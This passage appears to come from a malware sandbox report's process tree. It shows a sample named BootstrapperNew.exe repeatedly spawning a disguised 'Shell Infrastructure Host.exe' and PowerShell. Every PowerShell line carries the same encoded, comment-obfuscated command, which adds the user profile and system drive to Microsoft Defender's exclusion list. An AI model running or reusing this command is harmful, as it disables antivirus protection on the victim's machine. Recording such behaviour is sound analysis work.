        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        32⤵
        
        PID:5792
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        32⤵
        
        PID:6476
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        32⤵
        
        PID:6340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        33⤵
        
        PID:4288
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        33⤵
        
        PID:6664
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        33⤵
        
        PID:6732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        34⤵
        
        PID:7108
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        34⤵
        
        PID:7088
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        34⤵
        
        PID:6272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        35⤵
        
        PID:6884
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        35⤵
        
        PID:6348
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        35⤵
        
        PID:6832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        36⤵
        
        PID:6756
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        36⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        36⤵
        
        PID:1876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        37⤵
        
        PID:3604
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        37⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        37⤵
        
        PID:6020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        38⤵
        
        PID:728
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        38⤵
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        38⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        39⤵
        
        PID:5500
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        39⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        39⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        40⤵
        
        PID:3504
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        40⤵
        
        PID:7004
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        40⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        41⤵
        
        PID:5980
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        41⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        41⤵
        
        PID:3744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        42⤵
        
        PID:516
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        42⤵
        
        PID:3132
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        42⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        43⤵
        
        PID:464
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        43⤵
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        43⤵
        
        PID:2152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        44⤵
        
        PID:5212
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        44⤵
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        44⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        45⤵
        
        PID:4428
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        45⤵
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        45⤵
        
        PID:3956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        46⤵
        
        PID:440
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        46⤵
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        46⤵
        
        PID:4492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        47⤵
        
        PID:3352
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        47⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        47⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        48⤵
        
        PID:4152
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        48⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        48⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        49⤵
        
        PID:5596
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        49⤵
        
        PID:5404
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        49⤵
        
        PID:4324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        50⤵
        
        PID:2256
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        50⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        50⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        51⤵
        
        PID:4984
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        51⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        51⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        52⤵
        
        PID:4588
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        52⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        52⤵
        
        PID:5356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        53⤵
        
        PID:3220
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        53⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        53⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        54⤵
        
        PID:6052
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        54⤵
        
        PID:5248
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        54⤵
        
        PID:5864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        55⤵
        
        PID:6440
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        55⤵
        
        PID:6464
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        55⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        56⤵
        
        PID:5872
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        56⤵
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        56⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        57⤵
        
        PID:6848
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        57⤵
        
        PID:5888
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        57⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        58⤵
        
        PID:6684
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        58⤵
        
        PID:6496
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        58⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        59⤵
        
        PID:5296
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        59⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        59⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
